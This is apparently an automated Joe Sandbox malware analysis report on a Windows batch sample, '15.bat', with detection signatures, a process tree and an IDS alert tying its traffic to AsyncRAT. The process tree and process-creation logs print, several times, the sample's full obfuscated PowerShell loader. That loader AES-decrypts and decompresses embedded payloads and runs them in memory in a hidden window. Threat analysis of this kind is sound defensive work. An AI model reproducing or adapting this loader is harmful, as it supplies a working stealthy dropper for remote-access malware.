Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
15.bat

Overview

General Information

Sample name:15.bat
Analysis ID:1429038
MD5:1bf971e48ba0ca904319be9147a96c33
SHA1:75078fd8b6a000b848eb3f372e5f84fb58d5b98e
SHA256:74742f3e892f02c91b2f2dd9e1547ffe42681bb755b0f28b2dd602afb46af39e
Tags:bat
Infos:

Detection

Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Snort IDS alert for network traffic
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Suspicious powershell command line found
Very long command line found
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Stores large binary data to the registry
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 6264 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\15.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6556 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\15.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6336 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\15.bat';$MMJz='GelYestClYesurlYesrenlYestlYesProlYesceslYesslYes'.Replace('lYes', ''),'ChFGxTanFGxTgFGxTeEFGxTxFGxTteFGxTnsFGxTiFGxToFGxTnFGxT'.Replace('FGxT', ''),'EleTQWBmeTQWBnTQWBtAtTQWB'.Replace('TQWB', ''),'CrAFGseAFGsaAFGstAFGseAFGsDecAFGsryAFGsptAFGsorAFGs'.Replace('AFGs', ''),'SRlYbpRlYblRlYbiRlYbtRlYb'.Replace('RlYb', ''),'DoaAnecooaAnmpoaAnresoaAnsoaAn'.Replace('oaAn', ''),'EnHILctrHILcyHILcPoHILcinHILctHILc'.Replace('HILc', ''),'CDYnropDYnryToDYnr'.Replace('DYnr', ''),'ReaOApIdLiOApInesOApI'.Replace('OApI', ''),'IndQRQvodQRQkedQRQ'.Replace('dQRQ', ''),'TratglInstglIfotglIrmtglIFitglInatglIlBltglIotglIctglIktglI'.Replace('tglI', ''),'MbkBwaibkBwnbkBwModbkBwulbkBwebkBw'.Replace('bkBw', ''),'FroXggooXggmBaoXggseoXgg64SoXggtroXggioXggngoXgg'.Replace('oXgg', ''),'Loajyrjdjyrj'.Replace('jyrj', '');powershell -w hidden;function FBejp($JKmLP){$UerdI=[System.Security.Cryptography.Aes]::Create();$UerdI.Mode=[System.Security.Cryptography.CipherMode]::CBC;$UerdI.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$UerdI.Key=[System.Convert]::($MMJz[12])('dVsAn8RIciGbSq5PEUSffnRQiEF7D6JhJ+MhQGAxpxA=');$UerdI.IV=[System.Convert]::($MMJz[12])('rrMf8DdSiOTkJYW5AhOOlg==');$ytGVg=$UerdI.($MMJz[3])();$FTQFX=$ytGVg.($MMJz[10])($JKmLP,0,$JKmLP.Length);$ytGVg.Dispose();$UerdI.Dispose();$FTQFX;}function mpyCC($JKmLP){$FjjxJ=New-Object System.IO.MemoryStream(,$JKmLP);$sySFb=New-Object System.IO.MemoryStream;$Rdfpf=New-Object System.IO.Compression.GZipStream($FjjxJ,[IO.Compression.CompressionMode]::($MMJz[5]));$Rdfpf.($MMJz[7])($sySFb);$Rdfpf.Dispose();$FjjxJ.Dispose();$sySFb.Dispose();$sySFb.ToArray();}$BklLD=[System.IO.File]::($MMJz[8])([Console]::Title);$oNBKh=mpyCC (FBejp ([Convert]::($MMJz[12])([System.Linq.Enumerable]::($MMJz[2])($BklLD, 5).Substring(2))));$HuDRY=mpyCC (FBejp ([Convert]::($MMJz[12])([System.Linq.Enumerable]::($MMJz[2])($BklLD, 6).Substring(2))));[System.Reflection.Assembly]::($MMJz[13])([byte[]]$HuDRY).($MMJz[6]).($MMJz[9])($null,$null);[System.Reflection.Assembly]::($MMJz[13])([byte[]]$oNBKh).($MMJz[6]).($MMJz[9])($null,$null); " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 5868 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe MD5: 04029E121A0CFA5991749937DD22A1D9)
        • powershell.exe (PID: 6456 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\15.bat" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6556, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5868, ProcessName: powershell.exe

Snort Signatures

Timestamp:04/20/24-10:06:05.477978
SID:2850454
Source Port:4449
Destination Port:49730
Protocol:TCP
Classtype:A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for URL or domain
Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
Source: Binary string: \??\C:\Windows\Microsoft.Powershell.PSReadline.pdb2]xU source: powershell.exe, 00000006.00000002.1717945607.000001BB7EB79000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.Powershell.PSReadline.pdbY source: powershell.exe, 00000006.00000002.1716592666.000001BB7EA32000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadLine.PDB source: powershell.exe, 00000006.00000002.1717866725.000001BB7EB64000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000006.00000002.1717866725.000001BB7EB64000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\Microsoft.Powershell.PSReadline.pdbpdbine.pdb source: powershell.exe, 00000006.00000002.1717721868.000001BB7EB42000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000006.00000002.1716838402.000001BB7EA6D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1717479831.000001BB7EAD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1717945607.000001BB7EB79000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 00000006.00000002.1717945607.000001BB7EB79000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Core.pdb source: powershell.exe, 00000006.00000002.1717945607.000001BB7EB79000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000006.00000002.1717945607.000001BB7EB79000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Core.pdb source: powershell.exe, 00000006.00000002.1717945607.000001BB7EB79000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb. source: powershell.exe, 00000006.00000002.1717721868.000001BB7EB42000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1717945607.000001BB7EB79000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000006.00000002.1717721868.000001BB7EB42000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.Powershell.PSReadline.pdb: source: powershell.exe, 00000006.00000002.1717866725.000001BB7EB64000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000006.00000002.1717945607.000001BB7EB79000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1716592666.000001BB7EA32000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000006.00000002.1717721868.000001BB7EB42000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1717721868.000001BB7EB42000.00000004.00000020.00020000.00000000.sdmp

Networking

barindex
Snort IDS alert for network traffic
Source: TrafficSnort IDS: 2850454 ETPRO TROJAN Observed Malicious SSL Cert (AsyncRAT) 193.222.96.128:4449 -> 192.168.2.4:49730
Source: global trafficTCP traffic: 192.168.2.4:49730 -> 193.222.96.128:4449
Source: Joe Sandbox ViewASN Name: SWISSCOMSwisscomSwitzerlandLtdCH SWISSCOMSwisscomSwitzerlandLtdCH
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.128
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.128
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.128
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.128
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.128
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.128
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.128
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.128
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.128
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.128
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.128
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.128
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.128
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.128
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.128
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.128
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.128
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.128
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.128
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.128
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.128
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.128
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.128
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.128
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.128
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.128
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.128
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.128
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.128
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.128
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.128
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.128
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.128
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.128
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.128
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.128
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.128
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.128
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.128
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.128
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.128
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.128
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.128
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.128
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.128
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.128
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.128
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.128
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.128
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.128
Source: powershell.exe, 00000006.00000002.1698215372.000001BB663C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
Source: 77EC63BDA74BD0D0E0426DC8F80085060.5.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: powershell.exe, 00000006.00000002.1713621454.000001BB76AB4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1713621454.000001BB7697E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1698349267.000001BB66CD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000006.00000002.1698349267.000001BB66BD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000006.00000002.1698349267.000001BB668F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000006.00000002.1698349267.000001BB67F1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000006.00000002.1698349267.000001BB66BD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000006.00000002.1698349267.000001BB668F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000006.00000002.1698349267.000001BB66BD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000006.00000002.1698349267.000001BB66BD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000006.00000002.1698349267.000001BB66BD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000006.00000002.1698349267.000001BB66BD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000006.00000002.1698349267.000001BB67832000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000006.00000002.1713621454.000001BB76AB4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1713621454.000001BB7697E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1698349267.000001BB6850E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1698349267.000001BB66BD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000006.00000002.1698349267.000001BB67F1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
Source: powershell.exe, 00000006.00000002.1698349267.000001BB67F1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX

System Summary

barindex
Very long command line found
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2177
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2177Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9B8A6E306_2_00007FFD9B8A6E30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9B8AF8D86_2_00007FFD9B8AF8D8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9B8AF50D6_2_00007FFD9B8AF50D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9B8BDCA06_2_00007FFD9B8BDCA0
Source: classification engineClassification label: mal68.evad.winBAT@11/10@0/1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\MyDataJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5804:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\nkvohxapain
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6244:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_owwgvgmx.sep.ps1Jump to behavior
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\15.bat" "
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\15.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\15.bat"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\15.bat';$MMJz='GelYestClYesurlYesrenlYestlYesProlYesceslYesslYes'.Replace('lYes', ''),'ChFGxTanFGxTgFGxTeEFGxTxFGxTteFGxTnsFGxTiFGxToFGxTnFGxT'.Replace('FGxT', ''),'EleTQWBmeTQWBnTQWBtAtTQWB'.Replace('TQWB', ''),'CrAFGseAFGsaAFGstAFGseAFGsDecAFGsryAFGsptAFGsorAFGs'.Replace('AFGs', ''),'SRlYbpRlYblRlYbiRlYbtRlYb'.Replace('RlYb', ''),'DoaAnecooaAnmpoaAnresoaAnsoaAn'.Replace('oaAn', ''),'EnHILctrHILcyHILcPoHILcinHILctHILc'.Replace('HILc', ''),'CDYnropDYnryToDYnr'.Replace('DYnr', ''),'ReaOApIdLiOApInesOApI'.Replace('OApI', ''),'IndQRQvodQRQkedQRQ'.Replace('dQRQ', ''),'TratglInstglIfotglIrmtglIFitglInatglIlBltglIotglIctglIktglI'.Replace('tglI', ''),'MbkBwaibkBwnbkBwModbkBwulbkBwebkBw'.Replace('bkBw', ''),'FroXggooXggmBaoXggseoXgg64SoXggtroXggioXggngoXgg'.Replace('oXgg', ''),'Loajyrjdjyrj'.Replace('jyrj', '');powershell -w hidden;function FBejp($JKmLP){$UerdI=[System.Security.Cryptography.Aes]::Create();$UerdI.Mode=[System.Security.Cryptography.CipherMode]::CBC;$UerdI.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$UerdI.Key=[System.Convert]::($MMJz[12])('dVsAn8RIciGbSq5PEUSffnRQiEF7D6JhJ+MhQGAxpxA=');$UerdI.IV=[System.Convert]::($MMJz[12])('rrMf8DdSiOTkJYW5AhOOlg==');$ytGVg=$UerdI.($MMJz[3])();$FTQFX=$ytGVg.($MMJz[10])($JKmLP,0,$JKmLP.Length);$ytGVg.Dispose();$UerdI.Dispose();$FTQFX;}function mpyCC($JKmLP){$FjjxJ=New-Object System.IO.MemoryStream(,$JKmLP);$sySFb=New-Object System.IO.MemoryStream;$Rdfpf=New-Object System.IO.Compression.GZipStream($FjjxJ,[IO.Compression.CompressionMode]::($MMJz[5]));$Rdfpf.($MMJz[7])($sySFb);$Rdfpf.Dispose();$FjjxJ.Dispose();$sySFb.Dispose();$sySFb.ToArray();}$BklLD=[System.IO.File]::($MMJz[8])([Console]::Title);$oNBKh=mpyCC (FBejp ([Convert]::($MMJz[12])([System.Linq.Enumerable]::($MMJz[2])($BklLD, 5).Substring(2))));$HuDRY=mpyCC (FBejp ([Convert]::($MMJz[12])([System.Linq.Enumerable]::($MMJz[2])($BklLD, 6).Substring(2))));[System.Reflection.Assembly]::($MMJz[13])([byte[]]$HuDRY).($MMJz[6]).($MMJz[9])($null,$null);[System.Reflection.Assembly]::($MMJz[13])([byte[]]$oNBKh).($MMJz[6]).($MMJz[9])($null,$null); "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\15.bat" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\15.bat';$MMJz='GelYestClYesurlYesrenlYestlYesProlYesceslYesslYes'.Replace('lYes', ''),'ChFGxTanFGxTgFGxTeEFGxTxFGxTteFGxTnsFGxTiFGxToFGxTnFGxT'.Replace('FGxT', ''),'EleTQWBmeTQWBnTQWBtAtTQWB'.Replace('TQWB', ''),'CrAFGseAFGsaAFGstAFGseAFGsDecAFGsryAFGsptAFGsorAFGs'.Replace('AFGs', ''),'SRlYbpRlYblRlYbiRlYbtRlYb'.Replace('RlYb', ''),'DoaAnecooaAnmpoaAnresoaAnsoaAn'.Replace('oaAn', ''),'EnHILctrHILcyHILcPoHILcinHILctHILc'.Replace('HILc', ''),'CDYnropDYnryToDYnr'.Replace('DYnr', ''),'ReaOApIdLiOApInesOApI'.Replace('OApI', ''),'IndQRQvodQRQkedQRQ'.Replace('dQRQ', ''),'TratglInstglIfotglIrmtglIFitglInatglIlBltglIotglIctglIktglI'.Replace('tglI', ''),'MbkBwaibkBwnbkBwModbkBwulbkBwebkBw'.Replace('bkBw', ''),'FroXggooXggmBaoXggseoXgg64SoXggtroXggioXggngoXgg'.Replace('oXgg', ''),'Loajyrjdjyrj'.Replace('jyrj', '');powershell -w hidden;function FBejp($JKmLP){$UerdI=[System.Security.Cryptography.Aes]::Create();$UerdI.Mode=[System.Security.Cryptography.CipherMode]::CBC;$UerdI.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$UerdI.Key=[System.Convert]::($MMJz[12])('dVsAn8RIciGbSq5PEUSffnRQiEF7D6JhJ+MhQGAxpxA=');$UerdI.IV=[System.Convert]::($MMJz[12])('rrMf8DdSiOTkJYW5AhOOlg==');$ytGVg=$UerdI.($MMJz[3])();$FTQFX=$ytGVg.($MMJz[10])($JKmLP,0,$JKmLP.Length);$ytGVg.Dispose();$UerdI.Dispose();$FTQFX;}function mpyCC($JKmLP){$FjjxJ=New-Object System.IO.MemoryStream(,$JKmLP);$sySFb=New-Object System.IO.MemoryStream;$Rdfpf=New-Object System.IO.Compression.GZipStream($FjjxJ,[IO.Compression.CompressionMode]::($MMJz[5]));$Rdfpf.($MMJz[7])($sySFb);$Rdfpf.Dispose();$FjjxJ.Dispose();$sySFb.Dispose();$sySFb.ToArray();}$BklLD=[System.IO.File]::($MMJz[8])([Console]::Title);$oNBKh=mpyCC (FBejp ([Convert]::($MMJz[12])([System.Linq.Enumerable]::($MMJz[2])($BklLD, 5).Substring(2))));$HuDRY=mpyCC (FBejp ([Convert]::($MMJz[12])([System.Linq.Enumerable]::($MMJz[2])($BklLD, 6).Substring(2))));[System.Reflection.Assembly]::($MMJz[13])([byte[]]$HuDRY).($MMJz[6]).($MMJz[9])($null,$null);[System.Reflection.Assembly]::($MMJz[13])([byte[]]$oNBKh).($MMJz[6]).($MMJz[9])($null,$null); "Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hiddenJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
